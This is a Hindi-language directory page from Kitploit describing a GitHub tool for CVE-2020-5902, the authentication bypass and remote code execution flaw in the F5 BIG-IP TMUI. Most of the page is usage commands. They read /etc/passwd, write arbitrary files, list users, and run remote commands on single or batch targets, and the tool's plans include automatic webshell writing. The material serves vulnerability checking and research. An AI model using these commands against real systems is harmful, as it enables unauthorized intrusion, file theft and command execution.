Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
f5-bigip-rce-cve-2020-5902 — F5 BIG-IP RCE CVE-2020-5902 स्वचालित जाँच उपकरण | Kitploit
उपकरण/GitHubGitHub/thelsa/f5-bigip-rce-cve-2020-5902
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubthelsa/f5-bigip-rce-cve-2020-5902

f5-bigip-rce-cve-2020-5902

F5 BIG-IP RCE CVE-2020-5902 स्वचालित जाँच उपकरण

रिपॉजिटरी देखें
62176 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

F5 BIG-IP RCE(CVE-2020-5902)भेद्यता पहचान उपकरण

सारांश

20200706 को, ऑनलाइन F5 BIG-IP TMUI RCE भेद्यता उजागर हुई।

F5 BIG-IP के TMUI घटक (ट्रैफ़िक प्रबंधन उपयोगकर्ता इंटरफ़ेस) में प्रमाणीकरण बायपास भेद्यता है। यह भेद्यता Tomcat द्वारा पार्स किए गए URL और request.getPathInfo() के बीच अंतर के कारण उत्पन्न होती है, जिससे अनुमति सत्यापन को बायपास किया जा सकता है, TMUI मॉड्यूल के सभी कार्यों तक अनधिकृत पहुँच प्राप्त की जा सकती है, और फिर मनमानी फ़ाइलें पढ़ी/लिखी जा सकती हैं, कमांड निष्पादित किए जा सकते हैं, आदि।

विवरण के लिए देखें F5 BIG-IP TMUI RCE भेद्यता (CVE-2020-5902) पुनरुत्पादन और ध्यान देने योग्य बिंदु

यह उपकरण एकल IP जाँच, बैच IP जाँच, फ़ाइल पढ़ने/लिखने, प्रमाणित उपयोगकर्ताओं की सूची, निर्देशिका सूची, दूरस्थ कमांड निष्पादन और hsqldb प्रमाणीकरण बायपास जाँच का समर्थन करता है।

त्वरित प्रारंभ

pip install requests

hlep

python f5-bigip-rce-cve-2020-5902.py -h

poc check

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --check

batch poc check

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --check -t 20 -s 10

read file

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --fileread "/etc/passwd"

save file

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --filepath "/tmp/xxx.txt" --filecontent "x"

list auth user

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --list-users

list directory

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --listdir "/tmp/"

RCE

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --rce id --still-exploit

batch RCE

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --rce whoami --still-exploit -s 15 -t 20

hsqldb bypass check

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --bypass-hsqldb

batch hsqldb bypass check

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --bypass-hsqldb

नोट

बैच IP के लिए शुरुआत में जहाँ तक संभव हो http:// या https:// जोड़ने का प्रयास करें। यदि कोई प्रोटोकॉल नहीं है, तो डिफ़ॉल्ट रूप से http:// जोड़ा जाएगा।

यदि स्थितियाँ अनुमति देती हैं, तो --still-exploit पैरामीटर जोड़ने की अनुशंसा की जाती है। भले ही list auth user विफल हो, rce को निष्पादित करने से सफलता दर बढ़ जाती है।

TODO

  1. बैच सफलता दर बढ़ाने के लिए कई अनुरोध भेजना, दक्षता और प्रदर्शन के बीच संतुलन बनाना आवश्यक है।

  2. hsqldb इंटरफ़ेस के डिसीरियलाइज़ेशन शोषण को एकीकृत करना।

  3. स्वचालित रूप से webshell लिखने की क्षमता जोड़ना।

प्रतिक्रिया

issus
lsablog
gmail:[email protected]
qq:[email protected]

टूल डाउनलोड करें